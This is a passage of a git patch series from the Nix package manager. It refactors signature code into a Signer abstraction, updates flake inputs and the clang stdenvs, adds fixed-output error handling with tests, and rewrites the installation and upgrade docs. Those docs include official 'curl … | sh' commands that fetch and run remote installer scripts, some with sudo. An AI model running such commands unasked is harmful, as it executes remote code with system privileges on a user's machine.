BorrowedCryptoValue::parse(sig); - // FIXME: filter duplicates + auto key = publicKeys.find(std::string(ss.name)); + if (key == publicKeys.end()) return false; - for (auto s : settings.trustedPublicKeys.get()) { - PublicKey key(s); - publicKeys.emplace(key.name, key); - } - - for (auto secretKeyFile : settings.secretKeyFiles.get()) { - try { - SecretKey secretKey(readFile(secretKeyFile)); - publicKeys.emplace(secretKey.name, secretKey.toPublicKey()); - } catch (SysError & e) { - /* Ignore unreadable key files. That's normal in a - multi-user installation. */ - } - } - - return publicKeys; + return key->second.verifyDetachedAnon(data, ss.payload); } } diff --git a/src/libstore/crypto.hh b/src/libutil/signature/local-keys.hh similarity index 51% rename from src/libstore/crypto.hh rename to src/libutil/signature/local-keys.hh index 35216d470..4aafc1239 100644 --- a/src/libstore/crypto.hh +++ b/src/libutil/signature/local-keys.hh @@ -7,6 +7,25 @@ namespace nix { +/** + * Except where otherwise noted, Nix serializes keys and signatures in + * the form: + * + * ``` + * : + * ``` + */ +struct BorrowedCryptoValue { + std::string_view name; + std::string_view payload; + + /** + * This splits on the colon, the user can then separated decode the + * Base64 payload separately. + */ + static BorrowedCryptoValue parse(std::string_view); +}; + struct Key { std::string name; @@ -49,21 +68,36 @@ struct PublicKey : Key { PublicKey(std::string_view data); + /** + * @return true iff `sig` and this key's names match, and `sig` is a + * correct signature over `data` using the given public key. + */ + bool verifyDetached(std::string_view data, std::string_view sigs) const; + + /** + * @return true iff `sig` is a correct signature over `data` using the + * given public key. + * + * @param just the Base64 signature itself, not a colon-separated pair of a + * public key name and signature. + */ + bool verifyDetachedAnon(std::string_view data, std::string_view sigs) const; + private: PublicKey(std::string_view name, std::string && key) : Key(name, std::move(key)) { } friend struct SecretKey; }; +/** + * Map from key names to public keys + */ typedef std::map PublicKeys; /** * @return true iff ‘sig’ is a correct signature over ‘data’ using one * of the given public keys. */ -bool verifyDetached(const std::string & data, const std::string & sig, - const PublicKeys & publicKeys); - -PublicKeys getDefaultPublicKeys(); +bool verifyDetached(std::string_view data, std::string_view sig, const PublicKeys & publicKeys); } diff --git a/src/libutil/signature/signer.cc b/src/libutil/signature/signer.cc new file mode 100644 index 000000000..0d26867b5 --- /dev/null +++ b/src/libutil/signature/signer.cc @@ -0,0 +1,23 @@ +#include "signature/signer.hh" +#include "error.hh" + +#include + +namespace nix { + +LocalSigner::LocalSigner(SecretKey && privateKey) + : privateKey(privateKey) + , publicKey(privateKey.toPublicKey()) +{ } + +std::string LocalSigner::signDetached(std::string_view s) const +{ + return privateKey.signDetached(s); +} + +const PublicKey & LocalSigner::getPublicKey() +{ + return publicKey; +} + +} diff --git a/src/libutil/signature/signer.hh b/src/libutil/signature/signer.hh new file mode 100644 index 000000000..e50170fe2 --- /dev/null +++ b/src/libutil/signature/signer.hh @@ -0,0 +1,61 @@ +#pragma once + +#include "types.hh" +#include "signature/local-keys.hh" + +#include +#include + +namespace nix { + +/** + * An abstract signer + * + * Derive from this class to implement a custom signature scheme. + * + * It is only necessary to implement signature of bytes and provide a + * public key. + */ +struct Signer +{ + virtual ~Signer() = default; + + /** + * Sign the given data, creating a (detached) signature. + * + * @param data data to be signed. + * + * @return the [detached + * signature](https://en.wikipedia.org/wiki/Detached_signature), + * i.e. just the signature itself without a copy of the signed data. + */ + virtual std::string signDetached(std::string_view data) const = 0; + + /** + * View the public key associated with this `Signer`. + */ + virtual const PublicKey & getPublicKey() = 0; +}; + +using Signers = std::map; + +/** + * Local signer + * + * The private key is held in this machine's RAM + */ +struct LocalSigner : Signer +{ + LocalSigner(SecretKey && privateKey); + + std::string signDetached(std::string_view s) const override; + + const PublicKey & getPublicKey() override; + +private: + + SecretKey privateKey; + PublicKey publicKey; +}; + +} diff --git a/src/libutil/util.cc b/src/libutil/util.cc index 5bb3f374b..7b4b1d031 100644 --- a/src/libutil/util.cc +++ b/src/libutil/util.cc @@ -7,6 +7,7 @@ #include #include +#include namespace nix { @@ -28,6 +29,9 @@ void initLibUtil() { } // This is not actually the main point of this check, but let's make sure anyway: assert(caught); + + if (sodium_init() == -1) + throw Error("could not initialise libsodium"); } ////////////////////////////////////////////////////////////////////// diff --git a/src/nix/sigs.cc b/src/nix/sigs.cc index a57a407e6..dfef44869 100644 --- a/src/nix/sigs.cc +++ b/src/nix/sigs.cc @@ -112,7 +112,7 @@ struct CmdSign : StorePathsCommand std::string description() override { - return "sign store paths"; + return "sign store paths with a local key"; } void run(ref store, StorePaths && storePaths) override @@ -121,6 +121,7 @@ struct CmdSign : StorePathsCommand throw UsageError("you must specify a secret key file using '-k'"); SecretKey secretKey(readFile(secretKeyFile)); + LocalSigner signer(std::move(secretKey)); size_t added{0}; @@ -129,7 +130,7 @@ struct CmdSign : StorePathsCommand auto info2(*info); info2.sigs.clear(); - info2.sign(*store, secretKey); + info2.sign(*store, signer); assert(!info2.sigs.empty()); if (!info->sigs.count(*info2.sigs.begin())) { diff --git a/src/nix/verify.cc b/src/nix/verify.cc index f0234f7be..2a0cbd19f 100644 --- a/src/nix/verify.cc +++ b/src/nix/verify.cc @@ -5,6 +5,7 @@ #include "thread-pool.hh" #include "references.hh" #include "signals.hh" +#include "keys.hh" #include From 37ea1612c78b88884f7baecbb1bf81e65e571592 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 3 Jan 2024 19:38:22 -0500 Subject: [PATCH 194/654] flake: Go back to regular `nixos-23.05-small` MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Finally get off the ad-hoc staging commit! Flake lock file updates: • Updated input 'nixpkgs': 'github:NixOS/nixpkgs/36c4ac09e9bebcec1fa7b7539cddb0c9e837409c' (2023-11-30) → 'github:NixOS/nixpkgs/2c9c58e98243930f8cb70387934daa4bc8b00373' (2023-12-31) --- flake.lock | 8 ++++---- flake.nix | 12 +----------- tests/nixos/default.nix | 1 - 3 files changed, 5 insertions(+), 16 deletions(-) diff --git a/flake.lock b/flake.lock index db1a72c14..ae98d789a 100644 --- a/flake.lock +++ b/flake.lock @@ -34,16 +34,16 @@ }, "nixpkgs": { "locked": { - "lastModified": 1701355166, - "narHash": "sha256-4V7XMI0Gd+y0zsi++cEHd99u3GNL0xSTGRmiWKzGnUQ=", + "lastModified": 1704018918, + "narHash": "sha256-erjg/HrpC9liEfm7oLqb8GXCqsxaFwIIPqCsknW5aFY=", "owner": "NixOS", "repo": "nixpkgs", - "rev": "36c4ac09e9bebcec1fa7b7539cddb0c9e837409c", + "rev": "2c9c58e98243930f8cb70387934daa4bc8b00373", "type": "github" }, "original": { "owner": "NixOS", - "ref": "staging-23.05", + "ref": "nixos-23.05-small", "repo": "nixpkgs", "type": "github" } diff --git a/flake.nix b/flake.nix index 9217de9af..e6a88af9f 100644 --- a/flake.nix +++ b/flake.nix @@ -1,17 +1,7 @@ { description = "The purely functional package manager"; - # TODO Go back to nixos-23.05-small once - # https://github.com/NixOS/nixpkgs/pull/271202 is merged. - # - # Also, do not grab arbitrary further staging commits. This PR was - # carefully made to be based on release-23.05 and just contain - # rebuild-causing changes to packages that Nix actually uses. - # - # Once this is updated to something containing - # https://github.com/NixOS/nixpkgs/pull/271423, don't forget - # to remove the `nix.checkAllErrors = false;` line in the tests. - inputs.nixpkgs.url = "github:NixOS/nixpkgs/staging-23.05"; + inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.05-small"; inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2"; inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; inputs.libgit2 = { url = "github:libgit2/libgit2"; flake = false; }; diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix index 2645cac8e..4459aa664 100644 --- a/tests/nixos/default.nix +++ b/tests/nixos/default.nix @@ -10,7 +10,6 @@ let hostPkgs = nixpkgsFor.${system}.native; defaults = { nixpkgs.pkgs = nixpkgsFor.${system}.native; - nix.checkAllErrors = false; }; _module.args.nixpkgs = nixpkgs; }; From d8a2b06e2068b5209264dfc6d74d5cadf88b8684 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 4 Jan 2024 11:31:09 -0800 Subject: [PATCH 195/654] Remove `clang11Stdenv` Clang 11 doesn't have support for three-way-comparisons (<=>, "spaceship operator", "consistent comparisons") and is older than `clangStdenv`. `clangStdenv` is currently 12 on FreeBSD and Android and 16 on other platforms: https://github.com/NixOS/nixpkgs/blob/32e718f00c26c811be0062dd0777066f02406940/pkgs/top-level/all-packages.nix#L16629-L16644 Let's start by removing Clang 11 from our distribution. Next we can consider upgrading to Clang 17, which fully supports the spaceship operator: https://releases.llvm.org/17.0.1/tools/clang/docs/ReleaseNotes.html#what-s-new-in-clang-release --- doc/manual/src/contributing/hacking.md | 4 ++-- flake.nix | 1 - 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index dce0422dc..9a03ac9b6 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -31,7 +31,7 @@ This shell also adds `./outputs/bin/nix` to your `$PATH` so you can run `nix` im To get a shell with one of the other [supported compilation environments](#compilation-environments): ```console -$ nix develop .#native-clang11StdenvPackages +$ nix develop .#native-clangStdenvPackages ``` > **Note** @@ -96,7 +96,7 @@ $ nix-shell To get a shell with one of the other [supported compilation environments](#compilation-environments): ```console -$ nix-shell --attr devShells.x86_64-linux.native-clang11StdenvPackages +$ nix-shell --attr devShells.x86_64-linux.native-clangStdenvPackages ``` > **Note** diff --git a/flake.nix b/flake.nix index e6a88af9f..32354a88f 100644 --- a/flake.nix +++ b/flake.nix @@ -52,7 +52,6 @@ stdenvs = [ "ccacheStdenv" - "clang11Stdenv" "clangStdenv" "gccStdenv" "libcxxStdenv" From 388c79d546db0a2e636aa56e4d4b9a5dfde50db5 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 5 Jan 2024 15:15:25 +0100 Subject: [PATCH 196/654] Don't pull in libboost_regex We're not using and we don't want to pull in libicu (37 MiB). --- package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.nix b/package.nix index 56276ecc4..dfebdb0e4 100644 --- a/package.nix +++ b/package.nix @@ -248,7 +248,7 @@ in { # Copy libboost_context so we don't get all of Boost in our closure. # https://github.com/NixOS/nixpkgs/issues/45462 mkdir -p $out/lib - cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib + cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*} $out/lib rm -f $out/lib/*.a '' + lib.optionalString stdenv.hostPlatform.isLinux '' chmod u+w $out/lib/*.so.* From a4d33e816ef6c5baaed4eb65e826cd5aa75c0343 Mon Sep 17 00:00:00 2001 From: wiki-me <68199012+wiki-me@users.noreply.github.com> Date: Sat, 6 Jan 2024 20:01:10 +0200 Subject: [PATCH 197/654] Improve documentation around upgrading nix (#9679) * Improve documentation around upgrading nix, add replacing nix channel with new one Co-authored-by: Valentin Gagarin --- doc/manual/src/installation/upgrading.md | 35 ++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/doc/manual/src/installation/upgrading.md b/doc/manual/src/installation/upgrading.md index 6d09f54d8..d1b64b80b 100644 --- a/doc/manual/src/installation/upgrading.md +++ b/doc/manual/src/installation/upgrading.md @@ -1,5 +1,40 @@ # Upgrading Nix +> **Note** +> +> These upgrade instructions apply for regular Linux distributions where Nix was installed following the [installation instructions in this manual](./index.md). + +First, find the name of the current [channel](@docroot@/command-ref/nix-channel.md) through which Nix is distributed: + +```console +$ nix-channel --list +``` + +By default this should return an entry for Nixpkgs: + +```console +nixpkgs https://nixos.org/channels/nixpkgs-23.05 +``` + +Check which Nix version will be installed: + +```console +$ nix-shell -p nix -I nixpkgs=channel:nixpkgs-23.11 --run "nix --version" +nix (Nix) 2.18.1 +``` + +> **Warning** +> +> Writing to the [local store](@docroot@/store/types/local-store.md) with a newer version of Nix, for example by building derivations with `nix-build` or `nix-store --realise`, may change the database schema! +> Reverting to an older version of Nix may therefore require purging the store database before it can be used. + +Update the channel entry: + +```console +$ nix-channel --remove nixpkgs +$ nix-channel --add https://nixos.org/channels/nixpkgs-23.11 nixpkgs +``` + Multi-user Nix users on macOS can upgrade Nix by running: `sudo -i sh -c 'nix-channel --update && nix-env --install --attr nixpkgs.nix && From 8e865f3aba526394ca333efe7258bd8db0050fbb Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 6 Jan 2024 22:45:25 +0100 Subject: [PATCH 198/654] deduplicate installation instructions (#9507) * deduplicate installation instructions - reorder sections to present pinned installation more prominently - remove outdated notes on the macOS installer rework - update instructions to handle the installer tarball Co-authored-by: Travis A. Everett --- .../src/installation/installing-binary.md | 162 +++++++++--------- doc/manual/src/quick-start.md | 1 - 2 files changed, 77 insertions(+), 86 deletions(-) diff --git a/doc/manual/src/installation/installing-binary.md b/doc/manual/src/installation/installing-binary.md index ffabb250a..0dc989159 100644 --- a/doc/manual/src/installation/installing-binary.md +++ b/doc/manual/src/installation/installing-binary.md @@ -1,26 +1,60 @@ # Installing a Binary Distribution -The easiest way to install Nix is to run the following command: +To install the latest version Nix, run the following command: ```console $ curl -L https://nixos.org/nix/install | sh ``` -This will run the installer interactively (causing it to explain what -it is doing more explicitly), and perform the default "type" of install -for your platform: -- single-user on Linux -- multi-user on macOS +This performs the default type of installation for your platform: - > **Notes on read-only filesystem root in macOS 10.15 Catalina +** - > - > - It took some time to support this cleanly. You may see posts, - > examples, and tutorials using obsolete workarounds. - > - Supporting it cleanly made macOS installs too complex to qualify - > as single-user, so this type is no longer supported on macOS. +- [Multi-user](#multi-user-installation): + - Linux with systemd and without SELinux + - macOS +- [Single-user](#single-user-installation): + - Linux without systemd + - Linux with SELinux -We recommend the multi-user install if it supports your platform and -you can authenticate with `sudo`. +We recommend the multi-user installation if it supports your platform and you can authenticate with `sudo`. + +The installer can configured with various command line arguments and environment variables. +To show available command line flags: + +```console +$ curl -L https://nixos.org/nix/install | sh -s -- --help +``` + +To check what it does and how it can be customised further, [download and edit the second-stage installation script](#installing-from-a-binary-tarball). + +# Installing a pinned Nix version from a URL + +Version-specific installation URLs for all Nix versions since 1.11.16 can be found at [releases.nixos.org](https://releases.nixos.org/?prefix=nix/). +The directory for each version contains the corresponding SHA-256 hash. + +All installation scripts are invoked the same way: + +```console +$ export VERSION=2.19.2 +$ curl -L https://releases.nixos.org/nix/nix-$VERSION/install | sh +``` + +# Multi User Installation + +The multi-user Nix installation creates system users and a system service for the Nix daemon. + +Supported systems: + +- Linux running systemd, with SELinux disabled +- macOS + +To explicitly instruct the installer to perform a multi-user installation on your system: + +```console +$ curl -L https://nixos.org/nix/install | sh -s -- --daemon +``` + +You can run this under your usual user account or `root`. +The script will invoke `sudo` as needed. # Single User Installation @@ -30,60 +64,48 @@ To explicitly select a single-user installation on your system: $ curl -L https://nixos.org/nix/install | sh -s -- --no-daemon ``` -This will perform a single-user installation of Nix, meaning that `/nix` -is owned by the invoking user. You can run this under your usual user -account or root. The script will invoke `sudo` to create `/nix` -if it doesn’t already exist. If you don’t have `sudo`, you should -manually create `/nix` first as root, e.g.: +In a single-user installation, `/nix` is owned by the invoking user. +The script will invoke `sudo` to create `/nix` if it doesn’t already exist. +If you don’t have `sudo`, manually create `/nix` as `root`: ```console -$ mkdir /nix -$ chown alice /nix +$ su root +# mkdir /nix +# chown alice /nix ``` -The install script will modify the first writable file from amongst -`.bash_profile`, `.bash_login` and `.profile` to source -`~/.nix-profile/etc/profile.d/nix.sh`. You can set the -`NIX_INSTALLER_NO_MODIFY_PROFILE` environment variable before executing -the install script to disable this behaviour. +# Installing from a binary tarball -# Multi User Installation +You can also download a binary tarball that contains Nix and all its dependencies: +- Choose a [version](https://releases.nixos.org/?prefix=nix/) and [system type](../contributing/hacking.md#platforms) +- Download and unpack the tarball +- Run the installer -The multi-user Nix installation creates system users, and a system -service for the Nix daemon. - -**Supported Systems** -- Linux running systemd, with SELinux disabled -- macOS - -You can instruct the installer to perform a multi-user installation on -your system: - -```console -$ curl -L https://nixos.org/nix/install | sh -s -- --daemon -``` - -The multi-user installation of Nix will create build users between the -user IDs 30001 and 30032, and a group with the group ID 30000. You -can run this under your usual user account or root. The script -will invoke `sudo` as needed. - -> **Note** +> **Example** > -> If you need Nix to use a different group ID or user ID set, you will -> have to download the tarball manually and [edit the install -> script](#installing-from-a-binary-tarball). +> ```console +> $ pushd $(mktemp -d) +> $ export VERSION=2.19.2 +> $ export SYSTEM=x86_64-linux +> $ curl -LO https://releases.nixos.org/nix/nix-$VERSION/nix-$VERSION-$SYSTEM.tar.xz +> $ tar xfj nix-$VERSION-$SYSTEM.tar.xz +> $ cd nix-$VERSION-$SYSTEM +> $ ./install +> $ popd +> ``` -The installer will modify `/etc/bashrc`, and `/etc/zshrc` if they exist. -The installer will first back up these files with a `.backup-before-nix` -extension. The installer will also create `/etc/profile.d/nix.sh`. +The installer can be customised with the environment variables declared in the file named `install-multi-user`. + +## Native packages for Linux distributions + +The Nix community maintains installers for some Linux distributions in their native packaging format(https://nix-community.github.io/nix-installers/). # macOS Installation + []{#sect-macos-installation-change-store-prefix}[]{#sect-macos-installation-encrypted-volume}[]{#sect-macos-installation-symlink}[]{#sect-macos-installation-recommended-notes} - -We believe we have ironed out how to cleanly support the read-only root +We believe we have ironed out how to cleanly support the read-only root file system on modern macOS. New installs will do this automatically. This section previously detailed the situation, options, and trade-offs, @@ -126,33 +148,3 @@ this to run the installer, but it may help if you run into trouble: boot process to avoid problems loading or restoring any programs that need access to your Nix store -# Installing a pinned Nix version from a URL - -Version-specific installation URLs for all Nix versions -since 1.11.16 can be found at [releases.nixos.org](https://releases.nixos.org/?prefix=nix/). -The corresponding SHA-256 hash can be found in the directory for the given version. - -These install scripts can be used the same as usual: - -```console -$ curl -L https://releases.nixos.org/nix/nix-/install | sh -``` - -# Installing from a binary tarball - -You can also download a binary tarball that contains Nix and all its -dependencies. (This is what the install script at - does automatically.) You should unpack -it somewhere (e.g. in `/tmp`), and then run the script named `install` -inside the binary tarball: - -```console -$ cd /tmp -$ tar xfj nix-1.8-x86_64-darwin.tar.bz2 -$ cd nix-1.8-x86_64-darwin -$ ./install -``` - -If you need to edit the multi-user installation script to use different -group ID or a different user ID range, modify the variables set in the -file named `install-multi-user`. diff --git a/doc/manual/src/quick-start.md b/doc/manual/src/quick-start.md index 04a0b7c96..75853ced7 100644 --- a/doc/manual/src/quick-start.md +++ b/doc/manual/src/quick-start.md @@ -10,7 +10,6 @@ For more in-depth information you are kindly referred to subsequent chapters. ``` The install script will use `sudo`, so make sure you have sufficient rights. - On Linux, `--daemon` can be omitted for a single-user install. For other installation methods, see the detailed [installation instructions](installation/index.md). From fe751fbde22aea0362993ab7212f96630443c307 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 6 Jan 2024 23:44:15 +0100 Subject: [PATCH 199/654] don't show channels in upgrade instructions channels make everything more stateful, and therefore more complicated and potentially confusing, but aren't needed for this task, so don't encourage their use. --- doc/manual/src/installation/upgrading.md | 49 ++++++++++-------------- 1 file changed, 20 insertions(+), 29 deletions(-) diff --git a/doc/manual/src/installation/upgrading.md b/doc/manual/src/installation/upgrading.md index d1b64b80b..47618e2f5 100644 --- a/doc/manual/src/installation/upgrading.md +++ b/doc/manual/src/installation/upgrading.md @@ -2,48 +2,39 @@ > **Note** > -> These upgrade instructions apply for regular Linux distributions where Nix was installed following the [installation instructions in this manual](./index.md). +> These upgrade instructions apply where Nix was installed following the [installation instructions in this manual](./index.md). -First, find the name of the current [channel](@docroot@/command-ref/nix-channel.md) through which Nix is distributed: +Check which Nix version will be installed, for example from one of the [release channels](http://channels.nixos.org/) such as `nixpkgs-unstable`: ```console -$ nix-channel --list -``` - -By default this should return an entry for Nixpkgs: - -```console -nixpkgs https://nixos.org/channels/nixpkgs-23.05 -``` - -Check which Nix version will be installed: - -```console -$ nix-shell -p nix -I nixpkgs=channel:nixpkgs-23.11 --run "nix --version" +$ nix-shell -p nix -I nixpkgs=channel:nixpkgs-unstable --run "nix --version" nix (Nix) 2.18.1 ``` > **Warning** > -> Writing to the [local store](@docroot@/store/types/local-store.md) with a newer version of Nix, for example by building derivations with `nix-build` or `nix-store --realise`, may change the database schema! +> Writing to the [local store](@docroot@/store/types/local-store.md) with a newer version of Nix, for example by building derivations with [`nix-build`](@docroot@/command-ref/nix-build.md) or [`nix-store --realise`](@docroot@/command-ref/nix-store/realise.md), may change the database schema! > Reverting to an older version of Nix may therefore require purging the store database before it can be used. -Update the channel entry: +### Linux multi-user ```console -$ nix-channel --remove nixpkgs -$ nix-channel --add https://nixos.org/channels/nixpkgs-23.11 nixpkgs +$ sudo su +# nix-env --install --file '' --attr nix cacert -I nixpkgs=channel:nixpkgs-unstable +# systemctl daemon-reload +# systemctl restart nix-daemon ``` -Multi-user Nix users on macOS can upgrade Nix by running: `sudo -i sh -c -'nix-channel --update && -nix-env --install --attr nixpkgs.nix && -launchctl remove org.nixos.nix-daemon && -launchctl load /Library/LaunchDaemons/org.nixos.nix-daemon.plist'` +## macOS multi-user -Single-user installations of Nix should run this: `nix-channel --update; -nix-env --install --attr nixpkgs.nix nixpkgs.cacert` +```console +$ sudo nix-env --install --file '' --attr nix -I nixpkgs=channel:nixpkgs-unstable +$ sudo launchctl remove org.nixos.nix-daemon +$ sudo launchctl load /Library/LaunchDaemons/org.nixos.nix-daemon.plist +``` -Multi-user Nix users on Linux should run this with sudo: `nix-channel ---update; nix-env --install --attr nixpkgs.nix nixpkgs.cacert; systemctl -daemon-reload; systemctl restart nix-daemon` +## Single-user all platforms + +```console +$ nix-env --install --file '' --attr nix cacert -I nixpkgs=channel:nixpkgs-unstable +``` From eeb2f083c5646bd3a66344cff69be586fd89a450 Mon Sep 17 00:00:00 2001 From: Shea Levy Date: Sun, 24 Dec 2023 06:44:56 -0500 Subject: [PATCH 200/654] Improve error message for fixed-outputs with references. This codepath is possible, e.g. with a dockerTools.pullImage of an image with a Nix store. --- src/libstore/store-api.cc | 5 ++++- tests/functional/fixed.nix | 9 +++++++++ tests/functional/fixed.sh | 3 +++ 3 files changed, 16 insertions(+), 1 deletion(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index c2516afb5..ad6e1cc0f 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -194,7 +194,10 @@ StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const Fixed if (info.hash.algo == HashAlgorithm::SHA256 && info.method == FileIngestionMethod::Recursive) { return makeStorePath(makeType(*this, "source", info.references), info.hash, name); } else { - assert(info.references.size() == 0); + if (!info.references.empty()) { + throw Error("fixed output derivation '%s' is not allowed to refer to other store paths.\nYou may need to use the 'unsafeDiscardReferences' derivation attribute, see the manual for more details.", + name); + } return makeStorePath("output:out", hashString(HashAlgorithm::SHA256, "fixed:out:" diff --git a/tests/functional/fixed.nix b/tests/functional/fixed.nix index babe71504..5bdf79333 100644 --- a/tests/functional/fixed.nix +++ b/tests/functional/fixed.nix @@ -48,6 +48,15 @@ rec { (f ./fixed.builder1.sh "flat" "md5" "ddd8be4b179a529afa5f2ffae4b9858") ]; + badReferences = mkDerivation rec { + name = "bad-hash"; + builder = script; + script = builtins.toFile "installer.sh" "echo $script >$out"; + outputHash = "1ixr6yd3297ciyp9im522dfxpqbkhcw0pylkb2aab915278fqaik"; + outputHashAlgo = "sha256"; + outputHashMode = "flat"; + }; + # Test for building two derivations in parallel that produce the # same output path because they're fixed-output derivations. parallelSame = [ diff --git a/tests/functional/fixed.sh b/tests/functional/fixed.sh index f1e1ce420..2405d059c 100644 --- a/tests/functional/fixed.sh +++ b/tests/functional/fixed.sh @@ -26,6 +26,9 @@ nix-build fixed.nix -A good2 --no-out-link echo 'testing reallyBad...' nix-instantiate fixed.nix -A reallyBad && fail "should fail" +echo 'testing fixed with references...' +expectStderr 1 nix-build fixed.nix -A badReferences | grepQuiet "not allowed to refer to other store paths" + # While we're at it, check attribute selection a bit more. echo 'testing attribute selection...' test $(nix-instantiate fixed.nix -A good.1 | wc -l) = 1 From faf87b51f76ba9794e65e1d17dc3debf759052cd Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 8 Jan 2024 14:14:36 +0100 Subject: [PATCH 201/654] Show why GC socket connection was refused Co-authored-by: John Ericson --- src/libstore/gc.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/gc.cc b/src/libstore/gc.cc index b5b9e2049..38a9c708b 100644 --- a/src/libstore/gc.cc +++ b/src/libstore/gc.cc @@ -141,7 +141,7 @@ void LocalStore::addTempRoot(const StorePath & path) /* The garbage collector may have exited or not created the socket yet, so we need to restart. */ if (e.errNo == ECONNREFUSED || e.errNo == ENOENT) { - debug("GC socket connection refused"); + debug("GC socket connection refused: %s", e.msg()) fdRootsSocket->close(); goto restart; } From c4c636284e4b7b057788383068967910c5a31856 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 8 Jan 2024 10:17:28 -0500 Subject: [PATCH 202/654] Only test bug fix with new enough deamon --- tests/functional/fixed.sh | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/tests/functional/fixed.sh b/tests/functional/fixed.sh index 2405d059c..d98d4cd15 100644 --- a/tests/functional/fixed.sh +++ b/tests/functional/fixed.sh @@ -26,8 +26,10 @@ nix-build fixed.nix -A good2 --no-out-link echo 'testing reallyBad...' nix-instantiate fixed.nix -A reallyBad && fail "should fail" -echo 'testing fixed with references...' -expectStderr 1 nix-build fixed.nix -A badReferences | grepQuiet "not allowed to refer to other store paths" +if isDaemonNewer "2.20pre20240108"; then + echo 'testing fixed with references...' + expectStderr 1 nix-build fixed.nix -A badReferences | grepQuiet "not allowed to refer to other store paths" +fi # While we're at it, check attribute selection a bit more. echo 'testing attribute selection...' From 605eba3829946eb04f1aaf1160cf11a55183c677 Mon Sep 17 00:00:00 2001 From: Weijia Wang <9713184+wegank@users.noreply.github.com> Date: Mon, 8 Jan 2024 17:31:27 +0100 Subject: [PATCH 203/654] Fix typo in configure.ac --- configure.ac | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac index b97e25bbd..369d62552 100644 --- a/configure.ac +++ b/configure.ac @@ -160,7 +160,7 @@ AC_ARG_ENABLE(doc-gen, AS_HELP_STRING([--disable-doc-gen],[disable documentation AC_SUBST(ENABLE_DOC_GEN) AS_IF( - [test "$ENABLE_BUILD" == "no" && test "$ENABLE_GENERATED_DOCS" == "yes"], + [test "$ENABLE_BUILD" == "no" && test "$ENABLE_DOC_GEN" == "yes"], [AC_MSG_ERROR([Cannot enable generated docs when building overall is disabled. Please do not pass '--enable-doc-gen' or do not pass '--disable-build'.])]) # Building without API docs is the default as Nix' C++ interfaces are internal and unstable. From 6a243e5ed281344135285d9093ef36969a867d73 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Mon, 8 Jan 2024 19:38:36 +0100 Subject: [PATCH 204/654] fix an old lost direct (#9458) this part must have been moved quite a while ago, but apparently so far no one noticed --- doc/manual/redirects.js | 1 + 1 file changed, 1 insertion(+) diff --git a/doc/manual/redirects.js b/doc/manual/redirects.js index 3b507adf3..d04f32b49 100644 --- a/doc/manual/redirects.js +++ b/doc/manual/redirects.js @@ -21,6 +21,7 @@ const redirects = { "chap-distributed-builds": "advanced-topics/distributed-builds.html", "chap-post-build-hook": "advanced-topics/post-build-hook.html", "chap-post-build-hook-caveats": "advanced-topics/post-build-hook.html#implementation-caveats", + "chap-writing-nix-expressions": "language/index.html", "part-command-ref": "command-ref/command-ref.html", "conf-allow-import-from-derivation": "command-ref/conf-file.html#conf-allow-import-from-derivation", "conf-allow-new-privileges": "command-ref/conf-file.html#conf-allow-new-privileges", From 53fdcbca509b6c5dacaea3d3c465d86e49b0dd74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jos=C3=A9=20Luis=20Lafuente?= Date: Mon, 8 Jan 2024 19:46:38 +0100 Subject: [PATCH 205/654] Add clang format configuration --- .clang-format | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 .clang-format diff --git a/.clang-format b/.clang-format new file mode 100644 index 000000000..9c0c0946a --- /dev/null +++ b/.clang-format @@ -0,0 +1,30 @@ +BasedOnStyle: LLVM +IndentWidth: 4 +BreakBeforeBraces: Custom +BraceWrapping: + AfterStruct: true + AfterClass: true + AfterFunction: true + AfterUnion: true + SplitEmptyRecord: false +PointerAlignment: Middle +FixNamespaceComments: false +SortIncludes: Never +#IndentPPDirectives: BeforeHash +SpaceAfterCStyleCast: true +SpaceAfterTemplateKeyword: false +AccessModifierOffset: -4 +AlignAfterOpenBracket: AlwaysBreak +AlignEscapedNewlines: DontAlign +ColumnLimit: 120 +BreakStringLiterals: false +BitFieldColonSpacing: None +AllowShortFunctionsOnASingleLine: Empty +AlwaysBreakTemplateDeclarations: Yes +BinPackParameters: false +BreakConstructorInitializers: BeforeComma +EmptyLineAfterAccessModifier: Leave # change to always/never later? +EmptyLineBeforeAccessModifier: Leave +#PackConstructorInitializers: BinPack +BreakBeforeBinaryOperators: NonAssignment +AlwaysBreakBeforeMultilineStrings: true From 4feb7d9f715021784952bea57b37a8628c9b6860 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 13:14:42 -0800 Subject: [PATCH 206/654] Combine `AbstractPos`, `PosAdapter`, and `Pos` Also move `SourcePath` into `libutil`. These changes allow `error.hh` and `error.cc` to access source path and position information, which we can use to produce better error messages (for example, we could consider omitting filenames when 